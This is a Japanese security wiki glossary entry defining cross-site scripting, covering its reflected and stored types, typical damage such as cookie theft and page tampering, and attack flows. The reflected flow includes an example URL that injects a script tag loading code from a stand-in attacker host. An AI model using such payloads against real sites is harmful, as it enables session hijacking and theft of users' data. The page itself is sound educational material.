XSS

提供: セキュリティ
移動: 案内検索
スポンサーリンク

XSS は、 Cross Site Scripting の略です。悪意ある第三者がJavaScriptをページのクエリや CGM (掲示板など)のコメントとして書き込み、ウェブページに悪意あるJavaScriptを埋め込み、セッションを乗っ取ったり、セッション Cookie を盗んだり、ページの改竄、情報の搾取などを行う攻撃のことです。

読み方

XSS
えっくすえすえす
Cross Site Scripting
クロスサイトスクリプティング
Stored XSS
すとあど えっくす えす えす
Reflected XSS
りふれくてっど えっくす えす えす

概要

XSS には、以下のタイプが存在します。

  • 折り返し型 XSS ( Reflected XSS )
    • フィッシングメール、攻撃用 Web サーバの利用
  • 蓄積型 XSS (Stored XSS)
    • SNS, 掲示板、ブログ

被害

JavaScript で実現可能なこと範囲で、被害を受けます。 被害の例を以下に挙げます。

  • Cookie の漏洩
  • 情報漏えい
  • Web ページの改ざん
  • マルウェアの感染
  • 別のサイトへの誘導

Reflected XSS

  1. http://example.com/?id=<script src="http://eval.com/bad.js"></script>
    へユーザを送り込む。
  2. ユーザが example.com にアクセスすると、 example.com は、 id の値をそのままエコーバックする。
  3. example.com のページは、 eval.com/bad.js をロードし、 example.com の権限で実行される。

Stored XSS

  1. 掲示板に「悪意のあるスクリプト」を書き込む。
    <script>
    悪意のあるスクリプト
    </script>
  2. その掲示板に第三者がアクセスする。
  3. 「悪意のあるスクリプト」を含む HTML ページがロードされる。
  4. 第三者のブラウザで、「悪意のあるスクリプト」が実行される。

関連情報



スポンサーリンク